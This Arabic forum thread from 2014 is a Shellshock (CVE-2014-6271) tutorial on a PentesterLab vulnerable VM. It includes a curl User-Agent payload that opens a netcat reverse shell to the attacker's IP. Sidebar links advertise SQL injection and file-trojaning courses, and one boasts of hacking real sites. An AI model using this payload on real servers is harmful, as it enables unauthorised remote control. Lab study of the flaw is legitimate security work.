1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع
  4. 2- التقنيات المٌتقدِّمه النهائية في مجال كسر الحمايات المٌتعدِّية بقواعد البيانات - الجٌزء الأول
    الكثير من الحمايات في الوقت الراهن قد تطورة إلي التقنيات المٌتعدِّيه التي لا تستطيع التقنيات البسيطه
    لذا توجب على المٌختصيين تقديم تقنيات تتناسب وهذه الحمايات الجديده قرائة الموضوع

[ شرح ] توضيح Shellshock الاكتشاف + الاستغلال

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Just for you, بتاريخ ‏6 أكتوبر 2014.

كاتب الموضوع : Just for you المشاهدات : 423 الردود : 5 ‏6 أكتوبر 2014
  1. غير متصل

    Just for you
    DeveloPer Plus

    عضو منذ:
    ‏3 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركآتهه ،

    اللهم صل وسلم وبآرك على سيدنا محمد وعلى اله وصحبه اجمعين ،

    اليوم قررت اعمل هل موضوع عشان انهي امر ثغرة : Shellshock

    كثير صار لها كلام ، ومواضيع واخذت حجم كبير جداً . وهذا السبب الرئيسي الذي ادى الى ترقيع الثغرة بالكثير من السيرفرات

    نبدء على بركة الله

    اولاً

    الثغرة عبارة عن ضعف امني في الباش سكربت ،،

    الثغرة هذه اخطر من ثغرة القلب النازف التي كانت في بروتوكل الـ SSL

    ولكن هنالك شرط اساسي لنتمكن من الاستغلال وهو

    ان يكون لديك خدمة او برنامج في السيرفر ينفذ اوامر الباش سكربت ، اي يستخدم الباش

    شفت كثير ناس تقول ملفات /cgi/ وشيء ذي كذا الامر خاطئ ماله علاقة الملف ،

    لكن البرنامج او الخدمة يكون يستخدم الباش

    طيب ترقيع الثغرة يكون من خلال تحديث الباش شيل

    نبدء على بركة الله في اكتشاف الثغرة

    بدايتاً قامت موقع Pentesterlab بتطوير توزيعة بسيطة جداً مصابة

    التوزيعة فيها اشياء بسطية جداً وحجمها بسط جداً جداً

    لتحميلها



    [PHP CODE]files.pentesterlab.com/cve-2014-6271/cve-2014-6271.iso[/PHP CODE]


    بعد التحميل نصبها في الفيموير مثلاً وادخلها

    نفذ امر sudo -s ، وبعدها فوراً نفذ ifconfig وخذ الاي بي واستعرضه

    تمام انا عملت كل هذا ويوم استعرضت كان الناتج

    [​IMG]

    تمام اشتغلت وكل شيء بحمد الله تمام ،،

    نشرح هل واجهة على السريع : CVE-2014-6271

    هو عنوان ارشفة الثغرة كل ثغرة تصل لنا يتم تصنيفها من خلال السنة التي اكتشفت بها

    و رقم الثغرة

    اي ان الثغرة هذه مكتشفة عام 2014 وهي رقم 6271 ،، رآئعع ..

    الان حتى نعرف انو في اصابة نجي نستعرض مصدر الصفحة عشان نعرف شو يلي عم يصير

    عندما استعرضت انا في البداية ظهر لي الكود التالي

    [​IMG]

    وهذا الكود هو كود جافا سكربت طيب ينفذ في ملف مساره

    /cgi-bin/status ، حلو كثير شفتو الملف هو مساره كذاcgi-bin لكن ليس هو المصاب بل المصاب

    هو الباش



    جميل جداً ، الان نفتح الملف هذا يلي هو بمسار cgi-bin/status

    [​IMG]

    حلوو جداً الان في اصابة وتم اكتشافها بهذه الطريقة

    طيب الان نذهب لـ الاستغلال
    {1!$2}

    اول شيء نعمل ريكوست من خلال مكتبة الكيرل باستخدم الخيار -k

    للملف ،

    الامر :



    [SQL]curl -k 192.168.136.129/cgi-bin/status[/SQL]


    والناتج كان

    [​IMG]

    طيب حلو كثير الان نكتب امر الاستغلال

    نخلي الركويست تمام ولح ناخذ الـ User-Agent تمام وبعدها لح نفذ امر من خلالها

    الامر هذا لح نعمل من خلاله اتصال بالنت كات على الاي بي الخاص بنا طيب نطبق على بركة

    الله تعآلى .

    نحط الامر

    [​IMG]

    تمام الامر :



    [SQL]curl -k http://192.168.136.129/cgi-bin/status -H 'User-Agent: () { :;}; /bin/bash -c "nc 192.168.1.5 8080 -e /bin/sh"'[/SQL]


    حلو كتير حددنا الاي بي الخاص بي + البورت المطلوب :{3!}:

    وهو 8080


    طيب لا تحطو انتر ابداً بس جهزو الامر ومن ترمنال جديد


    شغلو النت كات على التنصت على البورت 8080


    من خلال الامر :{y.}


    [SQL]nc -nlvp 8080[/SQL]


    طيب بعدها نرجع للترمنال القديم يلي فيه الامر ونفذ الامر ونرجع لترمنال النت كات


    ولح يكون الناتج هو



    [JS]Connection from [192.168.1.5] port 8080 [tcp/*] accepted (family 2, sport 35402)[/JS]


    مبروك الاتصال


    حلو كثير الان فيك تتحكم برآحتك بالسيرفر


    وبهيك خلصنا من Shellshock ،، وخلصنا من كل شيء فيها


    وسكرنا على الثغرة بالنسبة ﻷدوات الفحص انا افضل اليدوي ولكن في ادوات ابحثوا عنها [​IMG]

     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: توضيح Shellshock الاكتشاف + الاستغلال

    أحسنت الطرح
    ثغرة مهمة و خطيرة
    ان شاء الله تفيد الاخوان [​IMG]
    تحياتي لك اخي العزيز
     


  3. غير متصل

    فكها ان استطعتـ
    rankrank
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏24 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: توضيح Shellshock الاكتشاف + الاستغلال

    أحسنت {1!$8}
     


  4. غير متصل

    الحاق1
    rankrank
    Developer

    عضو منذ:
    ‏17 سبتمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: توضيح Shellshock الاكتشاف + الاستغلال

    أحسنت الطرح

    ان شاء الله تفيد الاخوان
     


  5. غير متصل

    No-Security <span style="font-weight: bold; text-shadow: #BBBB
    DeveloPer Plus

    عضو منذ:
    ‏16 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    رد: توضيح Shellshock الاكتشاف + الاستغلال

    روووووعة
     


  6. غير متصل

    كاسر قلوب الهكر
    Developer

    عضو منذ:
    ‏20 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: توضيح Shellshock الاكتشاف + الاستغلال

    تسلم ايدك :{1}:
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...